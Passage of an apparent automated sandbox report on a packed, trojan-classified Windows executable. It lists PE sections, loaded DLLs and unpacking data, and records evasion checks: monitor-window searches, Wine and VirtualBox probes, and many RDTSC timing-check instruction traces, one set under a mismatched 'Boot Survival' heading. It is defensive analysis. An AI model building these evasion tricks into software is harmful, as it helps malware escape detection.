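The parser is deliberately tolerant (it keys only on the Content-Disposition name), so it also handles the file-upload part in the benign request; a production detector would additionally check the response for the base64 blob the sample then feeds to CryptStringToBinaryA, as the API chains in the AV Detection section show.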

System Summary

Source: file.exe | Static PE information: section name: (empty or whitespace-only)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty or whitespace-only)
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_01017966
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C948B0
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_01020191
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_01016079
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00FC5926
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00F26212
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_0101CA15
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00FC0395
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_01021AB7
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_01019458
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00EE7EED
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_0101AF8C
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_01023642
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_0107EE5C
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_0101E6EE
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00C74A60 appears 316 times
Source: file.exe | Static PE information: Section: yqttidiy ZLIB complexity 0.9948113579080026
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C93A50 | API chain: CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C8CAE0 | API chain: CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\L5FVYZN0.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1731584 > 1048576
Source: file.exe | Static PE information: Raw size of yqttidiy is bigger than: 0x100000 < 0x18cc00

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 2.2.file.exe.c70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yqttidiy:EW;gxgxfcij:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yqttidiy:EW;gxgxfcij:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C96390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00C96390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b6298 should be: 0x1aebf4
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: yqttidiy
              Source: file.exeStatic PE information: section name: gxgxfcij
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01052115 push edx; mov dword ptr [esp], 5FDDA100h 2_2_01052423
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109E118 push 6A4BEBBBh; mov dword ptr [esp], esi 2_2_0109E1A8
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109A13A push 003C2794h; mov dword ptr [esp], edi 2_2_0109A18A
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0107F932 push edx; mov dword ptr [esp], edi 2_2_0107FAB4
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DA140 push ebx; mov dword ptr [esp], edi 2_2_010DA1D4
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00C97895 push ecx; ret 2_2_00C978A8
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010ED16A push 1CAEF664h; mov dword ptr [esp], edi 2_2_010ED236
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push ecx; mov dword ptr [esp], eax 2_2_0101796E
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push 303B26D2h; mov dword ptr [esp], edx 2_2_0101798F
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push eax; mov dword ptr [esp], 5FF5292Eh 2_2_01017ADF
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push 51B6A0F4h; mov dword ptr [esp], eax 2_2_01017B0B
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push ecx; mov dword ptr [esp], 66F666ADh 2_2_01017B77
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push 2EA30D36h; mov dword ptr [esp], edi 2_2_01017B97
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push ecx; mov dword ptr [esp], esi 2_2_01017BE5
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push ebx; mov dword ptr [esp], edi 2_2_01017C3E
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push 33D27FF9h; mov dword ptr [esp], ebx 2_2_01017CB7
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push esi; mov dword ptr [esp], edx 2_2_01017CE1
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push 05A7A7CFh; mov dword ptr [esp], eax 2_2_01017D53
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push edi; mov dword ptr [esp], 5EF61603h 2_2_01017E05
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push eax; mov dword ptr [esp], esi 2_2_01017E37
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push 78DC3100h; mov dword ptr [esp], edi 2_2_01017E41
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push eax; mov dword ptr [esp], 43409891h 2_2_01017ED2
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push 2A3C58C0h; mov dword ptr [esp], edi 2_2_01017F13
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push 25293D45h; mov dword ptr [esp], ecx 2_2_01017F33
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push 2DE4F1DAh; mov dword ptr [esp], edx 2_2_01017F3E
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push esi; mov dword ptr [esp], 5BE559ADh 2_2_01017F42
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push 572EF5B9h; mov dword ptr [esp], ebp 2_2_01017F8A
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push 4CF0A8A0h; mov dword ptr [esp], eax 2_2_01017FA8
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push ebx; mov dword ptr [esp], ecx 2_2_01017FD6
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push 36A6A924h; mov dword ptr [esp], edi 2_2_01018085
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01017966 push edx; mov dword ptr [esp], eax 2_2_01018115
              Source: file.exe Static PE information: section name: yqttidiy entropy: 7.953903563847724

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00C96390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00C96390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D48B second address: 105D491 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D491 second address: 105D504 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FAE58F85888h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e sub esi, dword ptr [ebp+122D37F5h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FAE58F85878h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov si, AF1Eh 0x00000036 mov dword ptr [ebp+122D2780h], edx 0x0000003c xchg eax, ebx 0x0000003d jmp 00007FAE58F85887h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D504 second address: 105D50F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAE58F85636h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105DF7E second address: 105DF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C23A second address: 105C23F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105DF85 second address: 105DFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FAE58F85884h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FAE58F85876h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105DD44 second address: 105DD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105DD48 second address: 105DD52 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAE58F8587Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105EAA9 second address: 105EAB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F1B9 second address: 105F1C3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAE58F85876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105FBC8 second address: 105FBCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10638D9 second address: 10638DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10638DD second address: 10638E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10638E1 second address: 1063902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FAE58F85888h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1015938 second address: 1015953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85647h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1015953 second address: 101595F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067988 second address: 1067999 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FAE58F85636h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067999 second address: 1067A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85886h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b jmp 00007FAE58F8587Ah 0x00000010 push 00000000h 0x00000012 mov bl, 2Dh 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FAE58F85878h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 jnc 00007FAE58F85878h 0x00000038 pushad 0x00000039 jmp 00007FAE58F8587Dh 0x0000003e jmp 00007FAE58F8587Ch 0x00000043 popad 0x00000044 popad 0x00000045 push eax 0x00000046 push edi 0x00000047 pushad 0x00000048 jo 00007FAE58F85876h 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068955 second address: 1068959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065557 second address: 1065572 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jc 00007FAE58F85876h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 pushad 0x00000013 jng 00007FAE58F85876h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B9B0 second address: 106B9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C8C9 second address: 106C8D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FAE58F85876h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C8D3 second address: 106C8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C8D7 second address: 106C948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov bx, 5E29h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FAE58F85878h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov ebx, esi 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007FAE58F85878h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 mov edi, 47DBC967h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FAE58F85887h 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068BAE second address: 1068C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F85641h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FAE58F85638h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007FAE58F85638h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 mov dword ptr fs:[00000000h], esp 0x0000004f movsx edi, si 0x00000052 mov eax, dword ptr [ebp+122D0185h] 0x00000058 jns 00007FAE58F8563Ah 0x0000005e push FFFFFFFFh 0x00000060 mov dword ptr [ebp+1243F6C8h], edi 0x00000066 nop 0x00000067 push ebx 0x00000068 pushad 0x00000069 jl 00007FAE58F85636h 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106FBB2 second address: 106FBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072A7E second address: 1072A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074C92 second address: 1074CC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAE58F85886h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106ED25 second address: 106ED57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jp 00007FAE58F8564Dh 0x00000013 jmp 00007FAE58F85647h 0x00000018 push eax 0x00000019 push edx 0x0000001a jl 00007FAE58F85636h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106EE06 second address: 106EE0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070C39 second address: 1070C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070C3E second address: 1070C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FAE58F85876h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070C48 second address: 1070C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071CC8 second address: 1071CD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071CD5 second address: 1071CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F8563Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073DDB second address: 1073DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073DE0 second address: 1073DE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073DE6 second address: 1073DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073DEA second address: 1073DFD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAE58F85636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074E89 second address: 1074E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B3FF second address: 107B404 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107F5F6 second address: 107F5FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107ECC0 second address: 107ECC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083C7F second address: 1083C89 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAE58F85876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083C89 second address: 1083CB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FAE58F8563Dh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 jmp 00007FAE58F8563Dh 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083CB6 second address: 1083CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAE58F85876h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAE58F8587Dh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083CD3 second address: 1083CFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e ja 00007FAE58F8563Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083FA7 second address: 1083FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A7E1 second address: 108A7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A7E7 second address: 108A7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FAE58F8587Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A7FF second address: 108A805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089CD6 second address: 1089CDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
